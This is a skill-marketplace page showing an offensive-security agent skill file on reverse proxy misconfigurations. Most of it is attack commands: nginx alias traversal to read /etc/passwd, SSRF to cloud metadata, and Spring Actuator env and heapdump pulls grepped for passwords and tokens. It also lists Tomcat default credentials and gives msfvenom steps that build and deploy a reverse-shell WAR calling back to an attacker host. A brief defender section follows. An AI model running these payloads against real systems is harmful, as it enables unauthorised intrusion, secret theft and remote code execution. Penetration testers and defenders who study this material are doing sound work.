Skip to main content

proxy-misconfig

Reverse proxy misconfigurations — nginx alias traversal, Apache mod_rewrite SSRF, Spring Boot Actuator exposure, Tomcat manager, IIS short-name disclosure.

설치로 이동

소스 정보

저장소
BitterSecurity/Decepticon
최근 소스 활동
2026년 5월 26일 03:12
감지된 SKILL.md 언어
영어
스타
5,611
포크
1,061

설치 방법

기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.

소스 파일 검토

설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.

SKILL.md 표시 중

SKILL.md
소스 지침 · 읽기 전용 미리보기
name
proxy-misconfig
description
Reverse proxy misconfigurations — nginx alias traversal, Apache mod_rewrite SSRF, Spring Boot Actuator exposure, Tomcat manager, IIS short-name disclosure.
metadata
{"when_to_use":"reverse proxy nginx apache iis tomcat spring actuator alias rewrite","mitre_attack":"T1190","subdomain":"infrastructure","upstream_ref":"skills/_corpus/payloads/Reverse Proxy Misconfigurations/ + Insecure Management Interface/"}
# Reverse Proxy Misconfigurations ## 1. Nginx alias traversal Nginx `alias` directive (vs `root`) is dangerous when URL pattern is prefix-based but alias is a directory: ```nginx location /static { alias /var/www/static/; # trailing slash CRITICAL } # But buggy: location /static { alias /var/www/static; # NO trailing slash → path traversal possible } ``` Bypass: ``` GET /static../etc/passwd → resolves to /var/www/static../etc/passwd → /var/www/etc/passwd (if exists) GET /static../ → directory listing if autoindex on ``` ## 2. Apache mod_rewrite SSRF ```apache RewriteRule ^/proxy/(.*) http://$1 [P] # Attacker: GET /proxy/internal-host.local/admin → server makes outbound to internal GET /proxy/169.254.169.254/latest/meta-data → AWS metadata SSRF ``` ## 3. Spring Boot Actuator exposure ```bash # Common endpoints if exposed curl $TARGET/actuator curl $TARGET/actuator/env # all env vars including secrets curl $TARGET/actuator/heapdump # full memory dump (often contains tokens/passwords) curl $TARGET/actuator/mappings # all routes curl $TARGET/actuator/loggers # logging config curl $TARGET/actuator/jolokia/ # JMX bridge → RCE in many configs # Pre-2.x style curl $TARGET/env curl $TARGET/dump curl $TARGET/trace curl $TARGET/heapdump ``` ## 4. Tomcat Manager ```bash curl -u tomcat:tomcat $TARGET/manager/text/list # Default creds: # tomcat:tomcat, admin:admin, admin:tomcat, role1:role1 # tomcat:s3cret, manager:manager # If logged in → upload WAR for RCE msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war curl -u admin:admin -T shell.war "$TARGET/manager/text/deploy?path=/shell" curl "$TARGET/shell/" # triggers shell ``` ## 5. IIS short-name disclosure (8.3 names) ```bash # Probe via specific URL pattern + difference in error curl -s -o /dev/null -w "%{http_code}\n" "$TARGET/A*~1*/" # 400 if exists, 404 if not — leaks first chars of files/dirs # Tool: shortscan, IIS_shortname_Scanner ``` ## 6. Nginx merge_slashes off + URL encoded ```bash GET /api//../../admin # if merge_slashes off, internal route mapping bypasses auth GET /api/%2e%2e/admin # URL-encoded traversal ``` ## 7. Header injection via X-Forwarded-* Some apps trust `X-Forwarded-For`/`X-Real-IP` from reverse proxy and use it for auth (admin from internal IP). If proxy doesn't strip incoming headers: ```bash curl -H "X-Forwarded-For: 127.0.0.1" $TARGET/admin curl -H "X-Real-IP: 10.0.0.1" $TARGET/admin curl -H "X-Original-Forwarded-For: 192.168.1.1" $TARGET/admin ``` ## 8. WebSocket Origin bypass via proxy Proxy doesn't validate WebSocket Origin → attacker-origin can connect. ```bash wscat -c "wss://target.com/ws" -H "Origin: https://evil.com" ``` ## 9. HTTP/2 specific attacks Some proxies have h2 → h1 downgrade bugs (smuggling). See `skills/exploit/web/smuggling.md`. ## 10. Tools - **Nuclei templates** for actuator/manager/admin discovery - **JFrog actuator scanner** - **shortscan** for IIS 8.3 - **smuggler.py** for h2 → h1 - **trustedheaders** for header injection ## PoC pattern ```bash # Spring Actuator curl -s "$TARGET/actuator/env" | jq '.propertySources[] | .properties' | head # Heap dump if accessible: curl -s -o /tmp/heap.bin "$TARGET/actuator/heapdump" strings /tmp/heap.bin | grep -iE 'password|token|secret|aws_access' | head ``` ## Severity | Bug | Severity | |---|---| | Actuator `/env` w/ secrets visible | Critical 9.8 | | Tomcat manager default-creds | Critical 9.8 (RCE) | | Nginx alias → /etc/passwd | High 8.0 | | Apache mod_rewrite SSRF → metadata | Critical 9.0 | | IIS short-name disclosure | Medium 4-5 | | X-Forwarded-For trust → admin | Critical 9.8 | ## Defender ```nginx # nginx — always trailing slash on alias location /static/ { alias /var/www/static/; } # Strip X-Forwarded-* from client real_ip_header X-Forwarded-For; set_real_ip_from 10.0.0.0/8; # only trust internal real_ip_recursive on; ``` Spring Boot: ```yaml management: endpoints: web: exposure: include: health, info # never * endpoint: env: enabled: false heapdump: enabled: false ``` ## Cross-references - Upstream: `skills/_corpus/payloads/Reverse Proxy Misconfigurations/` + `Insecure Management Interface/` - SSRF chain: `skills/exploit/web/ssrf.md` - HTTP smuggling: `skills/exploit/web/smuggling.md`
GitHub에서 보기